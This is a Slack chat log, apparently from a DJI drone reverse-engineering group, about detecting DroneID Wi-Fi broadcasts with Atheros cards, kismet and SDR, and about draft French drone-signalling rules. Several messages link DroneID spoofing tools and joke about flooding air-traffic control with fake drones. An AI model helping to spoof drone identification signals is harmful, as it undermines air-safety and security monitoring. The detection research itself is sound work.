oh hey guys, you can also use gr-80211 to detect spark / mavic air fwiw. <https://github.com/bastibl/gr-ieee802-11>
[2018-04-07 13:17:52]
codeforge :
hi, do you think that an hackrf could detect it?
[2018-04-07 15:17:20]
hostile :
yes
[2018-04-07 15:24:20]
codeforge :
thanks :+1:
[2018-04-09 15:58:23]
mathieu.peyrega :
Sorry this is in French, but it seems that in France, UAV over 800g will have to implement a "droneid" like protocol from beginning of July : <https://www.helicomicro.com/2018/04/05/signalements-electronique-lumineux-les-projets-de-textes-dapplications/>
[2018-04-09 16:08:26]
ben_lin :
So not p4p
[2018-04-09 16:09:00]
ben_lin :
Oh no
[2018-04-09 16:09:09]
ben_lin :
If it counts battery
[2018-04-09 16:11:25]
mathieu.peyrega :
this doc gives tech details about the frame format and frequencies/protocol that should be used : <http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-arrete-signalement.pdf>
[2018-04-09 16:13:12]
mathieu.peyrega :
(page 3/6). Is the current DJI droneid implementation matching this wifi 802.11n requirement? Obviously it will not match everything as it is also required to be unencrypted!
[2018-04-09 21:45:44]
validat0r :
wow
[2018-04-09 22:00:28]
validat0r :
nice find @mathieu.peyrega
[2018-04-09 22:01:47]
validat0r :
Article 6 defines a signaling light, not green, red or white, flashing in morse "U"
[2018-04-09 22:01:57]
validat0r :
. . _
[2018-04-09 22:06:11]
validat0r :
maybe a nice dark blue would suffice
[2018-04-10 01:45:20]
ben_lin :
RGB drones
[2018-04-10 03:18:37]
hostile :
I'll check into this more @mathieu.peyrega thanks...
[2018-04-10 03:21:20]
hostile :
<https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fnewsletter.ffam.asso.fr%2Fnwlt%2Ffichiers%2Fprojet-arrete-signalement.pdf&edit-text=&act=url>
[2018-04-10 04:54:59]
ben_lin :
so France is first
[2018-04-10 04:55:11]
ben_lin :
Then the whole EU might follow suit
[2018-04-10 04:55:54]
ben_lin :
Does the document specify who can read that broadcast, or is it public like ads-b?
[2018-04-10 05:55:04]
mathieu.peyrega :
I've been reading it more carefully and really this looks such a stupid specification to me... no minimal emission power required, no "omnidirectional antenna"....
[2018-04-10 05:55:31]
mathieu.peyrega :
and no encryption so it's open bar for spoofing whatever detection system they would set up
[2018-04-10 05:56:28]
mathieu.peyrega :
official law projects are: <http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-decret-signalement.pdf>
[2018-04-10 05:56:41]
mathieu.peyrega :
<http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-decret-seuils.pdf>
[2018-04-10 05:56:49]
mathieu.peyrega :
<http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-arrete-signalement.pdf>
[2018-04-10 05:57:00]
mathieu.peyrega :
(the second one only sets the max mass not concerned by the new requirements to 800g)
[2018-04-10 06:11:55]
mathieu.peyrega :
also it's quite ambiguous if this mass is with or without battery
[2018-04-10 06:33:36]
ben_lin :
That doesn‘t make any sense at all
[2018-04-10 06:33:48]
ben_lin :
So they decided to ditch the phantom for pro but keep the Mavic
[2018-04-10 06:44:37]
mathieu.peyrega :
no, the opposite, you have to implement the mechanism if you are heavier than 800g (with or without battery? I don't know...)
[2018-04-10 12:03:51]
hostile :
<https://dji-rev.slack.com/archives/C6T95M0N6/p1523336154000111> if you know the spec. You can read it. @ben_lin =]
[2018-04-10 12:06:33]
mathieu.peyrega :
official project page where they are seeking comments before May 5th: <https://www.entreprises.gouv.fr/numerique/renforcement-de-la-securite-de-usage-des-drones-civils> (there is an e-mail address or postal address).
[2018-04-10 12:07:45]
mathieu.peyrega :
Spoofing is explicitly prohibited in the document, also using unencrypted frames is IMHO a very bad idea.. Nothing is told explicitly about who is allowed to listen, maybe (probably) there is a more generic text for that, but the same comment as before applies...
[2018-04-10 12:08:53]
mathieu.peyrega :
I gave feedback that this may lead to security leaks, e.g. allowing one to "listen" to trajectories when we "surveyors" work on a project legally may leak some info about the map of the area (same as for this running record app that buzzed recently)
[2018-04-10 12:09:38]
mathieu.peyrega :
They are not addressing the "grandfathering" issue
[2018-04-10 12:12:12]
hostile :
"Spoofing is explicitely prohibited in the document" lololol he said "in the document" BWAHAHAHAHAHAHAHAHAHAH =]
[2018-04-10 12:12:20]
hostile :
need to prohibit that shit in the technology layer :wink:
[2018-04-10 12:12:32]
mathieu.peyrega :
I understand that of course...
[2018-04-10 12:12:38]
mathieu.peyrega :
that's what I wrote them
[2018-04-10 12:12:51]
hostile :
indeed. I know you grok that! these public officials are stupid tho
[2018-04-10 12:13:22]
mathieu.peyrega :
at least that will not make too many lines of code for you to implement "french drone detection" in your products :slightly_smiling_face:
[2018-04-10 12:13:39]
hostile :
do you have the exact wording where it says spoofing is prohibited?
[2018-04-10 12:13:49]
hostile :
indeed... i suspect Parrot has already implemented this, or will very soon
[2018-04-10 12:14:01]
mathieu.peyrega :
« Art. R. 20-25-2. - Is punishable by the fine provided for fifth-class contraventions: « The deliberate emission of an electronic or digital signal, referred to in the first paragraph of Article L. 34-9-2, that does not correspond to an actual flight, in progress at the time of the emission, and originating from an unmanned aircraft registered in the database referred to in Article XXX of the Transport Code. »
[2018-04-10 12:14:37]
mathieu.peyrega :
something like "deliberate emission of an electronic signal not matching a real flight...."
[2018-04-10 12:14:42]
hostile :
=]
[2018-04-10 12:15:33]
ben_lin :
France did faster than China
[2018-04-10 12:15:35]
ben_lin :
Wow
[2018-04-10 12:15:39]
ben_lin :
Oh wait
[2018-04-10 12:15:47]
hostile :
lol
[2018-04-10 12:17:17]
ben_lin :
I am waiting for spoofing to be exploited
[2018-04-10 12:17:52]
ben_lin :
Imagine French ATC seeing 10000 drones at the same time on radar, charging towards military runways
[2018-04-10 12:17:53]
mathieu.peyrega :
i really suck at those RF stuff, but i'm pretty sure that broadcasting a single Wifi frame type should be pretty easy even for me !
[2018-04-10 12:18:06]
hostile :
@ben_lin why wait? the time is now. =] <https://twitter.com/d0tslash/status/941348396949999617>
[2018-04-10 12:18:35]
ben_lin :
Rofl faster than expected
[2018-04-10 12:18:36]
hostile :
<https://github.com/rapid7/metasploit-framework/pull/9301/files#diff-122cdd376619bdae7265773f5ad64f66R137>
[2018-04-10 12:18:47]
hostile :
line 137 can be edited to support french DroneID with ease
[2018-04-10 12:19:47]
ben_lin :
Rekt
[2018-04-10 12:19:49]
ben_lin :
DO
[2018-04-10 12:19:51]
ben_lin :
DOA
[2018-04-10 12:25:40]
hostile :
hehe <https://twitter.com/d0tslash/status/983682341460697089>
[2018-04-10 12:28:14]
hostile :
also... here is a hardware example for DroneID spoofing. <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>
[2018-04-10 13:48:50]
mathieu.peyrega :
small "naive" question: I'm looking at 802.11 and it seems that management frames (type 0) only allow 12 subtypes, and subtype "6" is not one of them... How can I then implement a requirement asking me to be compliant with 802.11n AND use a frame with type 0 / subtype 6 :slightly_smiling_face: ?
[2018-04-10 13:49:51]
mathieu.peyrega :
does 802.11 "allow" subtypes not in the table 4.1 list ?
[2018-04-10 13:50:05]
mathieu.peyrega :
(I don't have the full doc)
[2018-04-11 12:42:16]
aholtzma :
@mathieu.peyrega you can download full 802.11 spec from IEEE
[2018-04-11 12:42:18]
aholtzma :
<https://ieeexplore.ieee.org/document/7786995/>
[2018-04-16 06:24:32]
mathieu.peyrega :
<https://www.icao.int/Meetings/DRONEENABLE2/Documents/ICAO%20RF_DRONE_ENABLE%202018I.pdf>
[2018-04-16 06:24:51]
mathieu.peyrega :
<https://www.icao.int/Meetings/DRONEENABLE2/Pages/default.aspx>
[2018-04-16 13:08:32]
hostile :
thanks for sharing that @mathieu.peyrega
[2018-04-16 14:27:56]
mathieu.peyrega :
you're welcome ! now you can plan a trip to China and test if their "go to jail" trigger is more sensitive than in Greece :slightly_smiling_face:
[2018-04-16 14:39:35]
hostile :
LOL
[2018-04-18 12:13:59]
aholtzma :
@mathieu.peyrega those links seem dead
[2018-04-18 12:16:02]
aholtzma :
actually looks like ICAO is down, LOL
[2018-04-18 12:16:20]
ender :
worked yesterday…
[2018-04-18 13:48:15]
hostile :
down for me too @aholtzma
[2018-04-18 13:57:20]
mathieu.peyrega :
for me too...
[2018-04-18 13:57:38]
ender :
NSA got a copy… :wink:
[2018-04-18 14:02:03]
jakub :
@jakub uploaded a file: [ICAO RF_DRONE_ENABLE 2018I.pdf](https://dji-rev.slack.com/files/U8TQ4SVF1/FA8CT1M6D/icao_rf_drone_enable_2018i.pdf)
[2018-04-18 14:06:48]
mathieu.peyrega :
both links back online...
[2018-04-18 14:24:17]
hostile :
@hostile uploaded a file: [image.png](https://dji-rev.slack.com/files/U60D1SM7V/FA88VKW0G/image.png)
[2018-04-18 14:24:22]
hostile :
lol
[2018-04-18 14:39:06]
jakub :
uploaded just in case :stuck_out_tongue:
[2018-04-26 15:33:51]
eseven :
This document could be interesting too! <https://conferences.sigcomm.org/sigcomm/2013/papers/srif/p9.pdf> :wink:
[2018-04-26 15:39:34]
hostile :
thanks
[2018-04-26 15:40:02]
hostile :
looks like that paper was written by the people who make the above code
[2018-04-26 15:40:17]
hostile :
<https://www.wime-project.net>
[2018-04-26 15:40:25]
eseven :
could be...
[2018-04-26 15:40:33]
hostile :
Bastian Bloessl is quoted in the paper it is 100% same work =]
[2018-04-26 15:41:59]
eseven :
But a little bit more explained... I'll try!
[2018-05-01 13:27:26]
hostile :
yes
[2018-05-01 13:27:35]
hostile :
you are messing with a Spark RC I see?
[2018-05-01 13:28:01]
hostile :
the Adhoc connections use 62:60:1f and 64:60:1f instead of the traditional 60:60:1f @miliu00
[2018-05-01 14:51:26]
eseven :
@hostile Ok. But the OUI assigned to DJI is 60:60:1F, and not the other ones. It means that it uses a third party's hardware and is using software defined interfaces.... ubiquiti hardware, maybe?
When spark is paired to RC, which MAC does it use to broadcast the droneid msgs?
[2018-05-01 14:59:58]
hostile :
no
[2018-05-01 15:00:07]
hostile :
assigned OUI doesn't mean anything
[2018-05-01 15:00:11]
hostile :
they can use what ever the fuck they want
[2018-05-01 15:00:19]
hostile :
the hardware is Atheros...
[2018-05-01 15:00:21]
hostile :
as it always has been
[2018-05-01 15:00:53]
hostile :
when paired to an RC it uses 62:60:1f over a 5mhz channel spacing adhoc link
[2018-05-01 17:33:54]
eseven :
Thanks @hostile! And is it the same for all DJI models? Droneid for phantom 3pro, does it use the same method or does it go embedded in lightbridge packets?
[2018-05-01 17:49:27]
hostile :
p3 has no droneID last I checked
[2018-05-03 14:49:48]
hostile :
@mathieu.peyrega what was the final conclusion of your Awus052nh testing? can you tell me the kernel module it uses? can you give me output of lsusb? does it indeed see the "5mhz" channel spacing that picks up the adhoc network ?
[2018-05-03 14:54:55]
mathieu.peyrega :
i'm not sure of the details, but basically i've never been able to pick up the adhoc network with it, but was definitely seeing other APs in the neighbourhood
[2018-05-03 14:55:07]
mathieu.peyrega :
i'll send the lsusb output soon
[2018-05-03 15:24:51]
hostile :
cool that's all I need
[2018-05-03 15:25:00]
hostile :
it tells me it was not actually working (as expected)
[2018-05-16 15:13:46]
pedrocab :
Hi all, I’ve been these days playing around with Spark and DroneID, but looks like it’s disabled. I see the option in the settings menu, but both UUID and desc are empty. When I try to enable it and sniff with kismet, nothing appears to be there. Is it possible that this feature is only enabled in some countries??
[2018-05-16 15:30:01]
pedrocab :
(Of course I see the Spark WPA ESSID Beacon Frames, but nothing about serial number, UUID or lat/long in these frames)
[2018-05-16 15:31:26]
pedrocab :
Spark MAC OUI is 60:60:1f
[2018-05-16 15:38:44]
kilrah :
motors running?
[2018-05-16 15:39:10]
kilrah :
using one of the very rare wifi adapters that supports the odd channel width used by the spark?
[2018-05-16 15:41:20]
pedrocab :
Yes, motors running. On the 5G band no adapter was able to detect the WiFi, so I forced the 2.4G band. Then I can capture the beacon frames, but nothing related to DroneID.
[2018-05-16 15:45:31]
kilrah :
see the messages further up, 60:60:1f are NOT the right packets, if you only get those then your wifi adapter is likely not tuning/not capable of tuning on to the correct non-standard channels.
[2018-05-16 15:46:05]
hostile :
@pedrocab what wifi card are you using?
[2018-05-16 15:46:16]
hostile :
you MUST use an Atheros card... that can tune to 5mhz
[2018-05-16 15:46:33]
hostile :
unless you are connecting via wifi with your phone
[2018-05-16 15:47:03]
hostile :
if you are not using Atheros PCI... or M.2 card... chances are you are doing it wrong.
[2018-05-16 15:49:02]
pedrocab :
I’m connecting to the Spark using phone, yes. On the laptop I’m sniffing with Alfa AWUS036AC card (Realtek rtl8812au)
[2018-05-16 15:49:22]
hostile :
which version of kismet are you using?
[2018-05-16 15:49:24]
hostile :
from git?
[2018-05-16 15:49:31]
pedrocab :
Yep
[2018-05-16 15:49:42]
hostile :
what firmware is on the spark?
[2018-05-16 15:50:08]
hostile :
in the kismet UI... click on the 60:60:1f drone and send me a screen shot plz
[2018-05-16 15:50:19]
hostile :
in the web interface
[2018-05-16 15:50:37]
pedrocab :
I have to check, don’t know by heart. I guess the last one, as I was flying the drone to test with motors on ...
[2018-05-16 15:50:59]
pedrocab :
Ok, I will send you screen shot.
[2018-05-16 15:51:13]
validat0r :
I tried that, too, with my spark a couple of weeks ago. Managed to see some incomplete droneid packets, not more sadly
[2018-05-16 15:52:16]
validat0r :
If you manage to find complete droneid packets with rth location and so on, I'd be interested in your setup
[2018-05-16 15:53:39]
hostile :
I do know DJI has broken the packet format a few times on wifi
[2018-05-16 15:53:57]
hostile :
it may also depend on the wifi card...
[2018-05-16 15:54:04]
hostile :
try atheros PCI instead of alfa
[2018-05-16 15:54:20]
hostile :
@pedrocab "Realtek rtl8812au" this 100% will NOT work ever
[2018-05-16 15:54:26]
hostile :
the kernel drivers don't support 5mhz channels
[2018-05-16 15:54:27]
hostile :
period
[2018-05-16 15:54:37]
hostile :
you are not going to find a USB card that this works with
[2018-05-16 15:54:46]
hostile :
it MUST be Atheros PCI or M.2.
[2018-05-16 15:55:45]
pedrocab :
I’m using astsam drivers, support monitor mode and 5Ghz
[2018-05-16 15:55:49]
validat0r :
Well, I read different stories here over the weeks. I'm not convinced I saw the whole packets.
[2018-05-16 15:56:24]
pedrocab :
But I will double check with Atheros PCI, thank you @hostile
[2018-05-16 16:12:53]
pedrocab :
<https://github.com/astsam/rtl8812au>
[2018-05-16 16:14:56]
hostile :
yeah it's the chipset... rtl won't ever do 5mhz
[2018-05-16 16:15:08]
hostile :
5ghz is not 5mhz
[2018-05-16 16:15:23]
hostile :
5mhz channel spacing on either 2.4ghz or 5.8ghz is what Droneid uses
[2018-05-16 16:15:28]
hostile :
MOST wifi is 20mhz channel spacing
[2018-05-16 16:15:38]
hostile :
stop confusing 5ghz with 5mhz
[2018-05-16 16:17:13]
pedrocab :
Sorry, you are totally right, I was reading 5Ghz, not 5Mhz
[2018-05-16 16:17:33]
pedrocab :
:joy::rolling_on_the_floor_laughing:
[2018-05-16 16:19:44]
jakub :
60meters band? hoh
[2018-05-16 16:19:47]
jakub :
:wink:
[2018-05-16 16:20:28]
validat0r :
I also tried to force the spark on 2.4ghz so I would have the chance to capture packets with 2.4ghz equipment .. Maybe a path for you, too
[2018-05-16 16:21:08]
pedrocab :
@hostile In which 802.11 standard are these 5 MHz wide channels defined?
[2018-05-16 16:23:21]
pedrocab :
I only found references on 802.11y (3.65Ghz) ...
[2018-05-16 16:23:22]
pedrocab :
<https://en.wikipedia.org/wiki/List_of_WLAN_channels>
[2018-05-16 16:23:30]
hostile :
it is out of spec...
[2018-05-16 16:23:37]
hostile :
it is not properly defined
[2018-05-16 16:23:39]
hostile :
only Atheros does it
[2018-05-16 16:23:45]
hostile :
people use it for long haul
[2018-05-16 16:24:15]
hostile :
<https://wiki.freebsd.org/dev/ath_hal%284%29/HalfQuarterRate>
[2018-05-16 16:24:17]
pedrocab :
Now I'm starting to understand why it's so hard to get them ..
[2018-05-16 16:24:18]
pedrocab :
xDDD
[2018-05-16 16:24:20]
hostile :
it is called "Quarter rate"
[2018-05-16 16:24:23]
pedrocab :
ok
[2018-05-16 16:24:34]
hostile :
only ar5k and ar9k can do it
[2018-05-16 16:25:00]
hostile :
ar5k is OLD tho and only does 2.4ghz
[2018-05-16 16:25:16]
hostile :
hence why you want ar9k
[2018-05-16 16:26:07]
hostile :
but one of these
[2018-05-16 16:26:09]
hostile :
```Atheros QCNFA222 AR5BWB222 802.11a/b/g/n 2.4/5GHz BT4.0 WIFI WLAN Card 4K380 M.2```
[2018-05-16 16:26:14]
pedrocab :
ok, <https://wikidevi.com/wiki/TP-LINK_TL-WN722N> should work, although it is USB, right?
[2018-05-16 16:26:25]
hostile :
there are NO usb cards that work
[2018-05-16 16:26:30]
hostile :
ONLY PCI or M.2
[2018-05-16 16:26:31]
hostile :
<https://www.ebay.com/itm/401394374583?ViewItem=&item=401394374583&ppid=PPX000608&cnac=US&rsta=en_US(en_US)&cust=9K576122N47635257&unptid=1b905872-0fb8-11e8-888e-101f7436f90c&t=&cal=f1f57fd92c44d&calc=f1f57fd92c44d&calf=f1f57fd92c44d&unp_tpcid=email-receipt-auction-payment&page=main:email&pgrp=main:email&e=op&mchn=em&s=ci&mail=sys>
[2018-05-16 16:26:46]
hostile :
(good for laptops) ---^
[2018-05-16 16:29:03]
pedrocab :
ok, got it
[2018-05-16 16:49:41]
pedrocab :
<http://laptopmedia.com/laptop-m-2-ngff-ssd-compatibility-list/>
[2018-05-16 16:50:07]
pedrocab :
list of laptops supporting M.2 connectors, not easy to find out a list
[2018-05-16 16:51:05]
pedrocab :
I should buy a PCI box or a new laptop ...
[2018-05-16 16:57:15]
hostile :
mini pci atheros is fine too...
[2018-05-16 16:57:25]
hostile :
almost every laptop has either mini pci or m.2 internally
[2018-05-16 16:57:35]
hostile :
anything semi modern at least
[2018-05-16 17:06:37]
pedrocab :
xD, yes. Mine is too old .. I need a new laptop
[2018-05-16 17:25:17]
pedrocab :
I will try to replace the internal Wifi card, I will let you know
[2018-05-16 17:25:32]
pedrocab :
Thank you
[2018-05-16 17:26:18]
pedrocab :
(the internal wifi adapter is mini pci, so let's try a new atheros card)
[2018-05-16 18:41:39]
hostile :
that should work fine
[2018-05-16 18:41:48]
hostile :
make sure it uses ath9k driver
[2018-05-16 18:41:51]
hostile :
and not ath10k
[2018-05-16 18:46:24]
kilrah :
nice $9 card, grabbed it
[2018-05-16 18:47:16]
kilrah :
will throw it on my udoo x86
[2018-05-16 18:47:18]
kilrah :
<https://shop.udoo.org/eu/x86.html>
[2018-05-16 18:49:59]
hostile :
nice
[2018-05-16 18:51:12]
mathieu.peyrega :
one small issue that may occur, some manufacturers have BIOS blacklists that prevent replacing the in-place card with another....
[2018-05-16 20:56:11]
pedrocab :
Uff, let’s give it a try... I hope it's not my case. The mini PCI adapter is just $9, nothing lost if there is such an annoying blacklist
[2018-05-16 20:57:12]
pedrocab :
Laptop is a Toshiba Satellite Z30, I will take a look if someone tried before to replace WiFi card
[2018-05-16 21:08:19]
pedrocab :
@kilrah Cool, the Udoo board, I have to test it
[2018-05-17 17:42:49]
aholtzma :
5/10 mhz is in the 802.11a standard for 5GHz
[2018-05-17 17:43:02]
aholtzma :
didn’t get carried over into 11n
[2018-05-17 17:43:15]
aholtzma :
for 2.5
[2018-05-17 17:44:08]
aholtzma :
what you can actually buy as a wifi product is governed by the wifi alliance and they define a subset of the 802.11 standards that is required to be wifi compliant
[2018-05-17 17:44:44]
aholtzma :
so some cards have extra features that are 802.11 compliant, but not part of wifi
[2018-05-17 17:54:09]
aholtzma :
ath5k can do 5MHz 11a, but the current linux driver may not support it
[2018-05-17 17:56:56]
aholtzma :
actually the combination of 5 MHz bandwidth and 11n (HT) frames would be non-compliant with 802.11
[2018-05-17 17:57:05]
aholtzma :
and wouldn’t work on ath5k since it doesn’t support 11n
[2018-05-17 17:57:27]
aholtzma :
I presume that is what DJI is using (HT frames)
[2018-05-17 18:36:18]
hostile :
@aholtzma I've used it recently and it does support it
[2018-05-17 18:36:27]
hostile :
it IS non compliant...
[2018-05-17 18:36:30]
hostile :
dji is running out of spec
[2018-05-17 18:36:40]
aholtzma :
5k?
[2018-05-17 18:38:22]
aholtzma :
I’m assuming they are using HT because that unlocks LDPC codes which is a range win
[2018-05-17 18:40:15]
aholtzma :
and mimo of course
[2018-05-17 18:43:13]
hostile :
yeah I have a laptop with an old Ubiquiti PCMCIA or Cardbus radio
[2018-05-17 18:43:16]
hostile :
that uses ath5k
[2018-05-17 18:43:27]
hostile :
I had to do nothing special... the atheros hal has 5mhz support in it
[2018-05-17 18:56:10]
aholtzma :
ok so I guess no HT
[2018-05-17 18:56:12]
aholtzma :
interesting
[2018-05-17 18:56:52]
aholtzma :
keep that in mind if you ever think you are missing frames
[2018-05-17 18:57:16]
aholtzma :
rate adaptation may flip you between modes
[2018-05-17 18:58:23]
aholtzma :
so you’ll get the non-HT frames
[2018-05-17 18:59:34]
aholtzma :
but the HT frames will get dumped
[2018-05-22 20:25:53]
pedrocab :
Hi all again
[2018-05-22 20:26:13]
pedrocab :
I just received the new atheros card today
[2018-05-22 20:27:02]
pedrocab :
@pedrocab uploaded a file: [atheros.jpg](https://dji-rev.slack.com/files/U9321V56E/FAUF4F98V/atheros.jpg)
[2018-05-22 20:27:36]
pedrocab :
AR5BHB92, using ath9k driver
[2018-05-22 20:27:55]
pedrocab :
dual band, 802.11 a/b/g/n
[2018-05-22 20:28:14]
pedrocab :
PCI-e
[2018-05-22 20:28:18]
pedrocab :
but ...
[2018-05-22 20:29:15]
pedrocab :
only the 60:60:1F MAC address, and no DroneID frames
[2018-05-22 20:32:52]
pedrocab :
I flew my spark around the card (5 mtrs), but nothing was detected by kismet as UAV
[2018-05-22 20:33:07]
pedrocab :
```
root@icarus:/opt/kismet/rest_examples# python uav_list.py
root@icarus:/opt/kismet/rest_examples#
```
[2018-05-22 20:34:06]
pedrocab :
I see the spark essid on kismet web UI, but
[2018-05-22 20:34:15]
pedrocab :
just as Wifi AP
[2018-05-22 20:34:34]
pedrocab :
```
ALERT: DOT11D IEEE80211 Access Point BSSID 60:60:1F:xxxx SSID
"Spark-RC-xxxx" advertised conflicting 802.11d information which
may indicate AP spoofing/impersonation
INFO: 802.11 Wi-Fi device 60:60:1F:xxxx advertising SSID 'Spark-xxx'
```
[2018-05-22 20:37:18]
pedrocab :
I will try this weekend to fly the drone just above the board, to be sure it's not a range problem, but 5 mtrs should be a short enough distance to receive the frames ...
[2018-05-22 20:57:00]
hostile :
did you edit your kismet config file?
[2018-05-22 20:57:21]
hostile :
source=wlan9k2:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"
[2018-05-22 20:57:35]
hostile :
make sure your source has the "W5" entries in it @pedrocab
[2018-05-22 21:05:04]
pedrocab :
No, dammit !! Totally right
[2018-05-22 21:05:52]
pedrocab :
Thank you again, @hostile
[2018-05-22 21:08:46]
hostile :
get it working?
[2018-05-22 21:10:55]
pedrocab :
On my way ...
[2018-05-22 21:23:43]
pedrocab :
```
ERROR: Could not set channel 12W5; ignoring error and continuing (unable
to set frequency 12 6 0 via mac80211: error code -7)
```
[2018-05-22 21:24:02]
pedrocab :
I'm checking these errors
[2018-05-22 21:25:42]
pedrocab :
however it starts up normally: Data source 'wlp4s0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11WG5,12W5,13W5,14W5"' launched successfully
[2018-05-22 21:44:22]
pedrocab :
I guess they are related to wifi regulatory domains/countries, as it is configured by default for US
[2018-05-22 21:44:35]
pedrocab :
I'm on it ...
[2018-05-22 22:30:58]
pedrocab :
Kismet is not able to tune on 149 to 163 -5Mhz- channels: "ERROR: Could not set channel xxW5; ignoring error and continuing (unable to set frequency xxx via mac80211: error code -7)", same on 12 to 14 channels (2.4).
[2018-05-22 22:31:13]
pedrocab :
@pedrocab uploaded a file: [channels.png](https://dji-rev.slack.com/files/U9321V56E/FATSHHSBT/channels.png)
[2018-05-22 22:33:18]
pedrocab :
I will continue investigating these errors tomorrow, I don't know if there is a problem with the "monitor mode" or are related with regulatory domains/countries
[2018-05-22 23:03:03]
pedrocab :
I forced the spark to use one of the 2.4G/5Mhz channels allowed by the card, and now I can see the 62:60:1F MAC device
[2018-05-22 23:03:49]
pedrocab :
It's too late to fly the drone, I guess when motors are powered on I will sniff the DroneID
[2018-05-22 23:12:24]
pedrocab :
I have to look carefully why kismet is unable to use/tune 5 Ghz channels
[2018-05-22 23:31:50]
hostile :
a few errors are fine @pedrocab just ignore them
[2018-05-22 23:32:29]
hostile :
as long as it is only like one or two of the channels don't worry
[2018-05-23 08:53:15]
pedrocab :
Ok @hostile
[2018-05-23 08:53:40]
pedrocab :
i'm trying a new approach, a SDR gnuradio block
[2018-05-23 08:53:53]
pedrocab :
as 5Mhz can be achieved by the HackRF
[2018-05-23 08:54:14]
pedrocab :
and forget about chipsets, wifi card, kismet, and so on ..
[2018-05-23 12:05:14]
hostile :
gr-80211 CAN pick it up, u have to feed the resulting pcap to kismet by hand
[2018-05-30 03:38:18]
sandwings247 :
Hey gang interested in this effort. So a quick catch up sees that you see nothing related to DroneID? You do realize that the Remote Identification function in the DJI Apps, sets the UUID, Identification and the Flight Info fields? If you have the slide button in the off position, then your data is not transmitted. However if you have the slide button for UUID set, then the UUID value is sent.
[2018-05-30 03:46:42]
sandwings247 :
Do you or have you seen the AeroScope System that DJI sell
[2018-05-30 04:15:47]
sandwings247 :
The UUID I've seen appears to be 112 bits, with a max of 128 bits. The 112 Bits equate to 14 characters in length. Does anyone else confirm this at all
[2018-05-30 11:47:29]
hostile :
Aeroscope is trash
[2018-05-30 22:11:14]
sandwings247 :
hey why is that
[2018-05-31 00:41:15]
hostile :
cuz they didn't invest much time into it
[2018-05-31 00:41:29]
hostile :
it was a reaction to criticism about their products, and not a solution to a problem
[2018-05-31 00:41:41]
hostile :
just like everything DJI does... semi rushed
[2018-06-01 14:20:04]
eseven :
@sandwings247 in the "Droneid" system, there are two kinds of packets, one with the structure you told and the other with the custom field information, with one field that can fit 100 chars.... By the way, with UUID on both. :wink:
[2018-06-01 15:09:14]
hostile :
<https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>
[2018-06-02 06:49:19]
eseven :
Good start document to investigate one step beyond...
[2018-06-04 04:56:48]
sandwings247 :
Have already seen that PDF by the folks at Mesmer. Of course Mesmer will go against the DJI push, as they charge a truck load of $$ for their system and the annual maintenance bill .... AeroScope is dirt cheap and out performs Mesmer's detection capabilities. Sorry if you work for Mesmer, but suspect you don't
[2018-06-04 13:27:07]
hostile :
@sandwings247 I work for Department 13... I helped build this place... I am happy to debate what ever you are implying....
[2018-06-04 13:27:45]
hostile :
AeroScope is NOT Dirt cheap... it is NOT $5000 like they said it is (more like 9k for the mobile I think, and more for the fixed site version), it requires a $60,000 SDK license to start doing the real stuff FWIW. So you are looking at like $70k to get started, and detecting only **SOME** of the DJI product line, ONLY the current revisions WITH drone ID enabled and not tampered with. Where as MESMER picks up non DJI products also, and does NOT require droneID signal present, and has been doing detections since Phantom2.
[2018-06-04 13:28:29]
hostile :
@sandwings247 "out performs Mesmers Detection capabilities" where ever did you get that impression at? Maybe I should say "sorry if you work for DJI...". That statement in and of itself tells me you don't have much experience around counter UAS platforms.
[2018-06-04 13:29:35]
hostile :
MESMER was well established before AeroScope was even considered a remote thought, DJI has been uncomfortable about D13 from day one, and argued that we can't even do the things that the US Govt has confirmed we can, such as mitigate LightBridge based drones.
[2018-06-04 13:30:44]
hostile :
@sandwings247 when have you used a MESMER system? and when have you used an Aeroscope? I've personally used them both. I can also make an aeroscope unit fall over and shit its pants in about 10 seconds worth of spoofing.
[2018-06-04 13:42:38]
ender :
^---- Grabbing a bag of Popcorn…
[2018-06-04 13:50:57]
hostile :
@sandwings247 the other thing about Aeroscope, it isn't even competition to MESMER, it only does 1/3 of what MESMER does if I were being conservative. You are only able to see, but can't do shit about it. want to watch a UAV deliver a bomb to its target? Get Aeroscope, want to actually prevent it from doing so... get something else WITH mitigation capability. And don't believe that Jammers are gonna help with your AeroScope SDK setup.
[2018-06-04 13:52:48]
hostile :
@hostile uploaded a file: [DCtxlocU0AEvyzT.jpg](https://dji-rev.slack.com/files/U60D1SM7V/FB19KV0S1/dctxlocu0aevyzt.jpg)
[2018-06-04 13:53:18]
hostile :
See those kumquats on the left.... those are AeroScope, See that other citrus right there, that fat Orange? That is MESMER. Any questions? Please come correct in your response. =]
[2018-06-04 13:54:34]
hostile :
detect only == dead....
[2018-06-05 00:32:44]
sandwings247 :
@hostile thanks for the posts, and guess I was wrong on the working for Mesmer. You would be rather foolish to think I've no C-UAS period, in fact, what I have access to, is more than you could wish for. I think all C-UAS systems are full of it, complete waste of money, and overstating the systems' capabilities. I know how "well" mesmer performs, and am aware of where it's deployed. Not sure where you sourced your info, but I can advise that I don't work for DJI, so you may wish to think again. I actually don't like Mesmer period, but I do have your "Department 13" reps try to sell us Mesmer, every year, and every year we reject Mesmer. Tell you what, show me your detection logs from Mesmer for actual Detects? I have all of the D13 papers, and all of the glossy powerpoint slides, and brochures. In fact, we had a Mesmer a year ago, which D13 loaned to help sell it to us.
[2018-06-05 00:44:17]
sandwings247 :
As for AeroScope, it actually works against all DJI Quads, and the other 25-30% of NON DJI, it doesn't, is not a major concern. 10 X AeroScopes at $5000 each, full access. No contracts, no maintenance fees. However your info is somewhat correct, DJI are upping the costs of AeroScope and are requiring a yearly maintenance fee like Mesmer.
[2018-06-05 00:45:01]
sandwings247 :
Thanks for the cool picture of the fruit. Good to see you are passionate
[2018-06-05 00:51:24]
hostile :
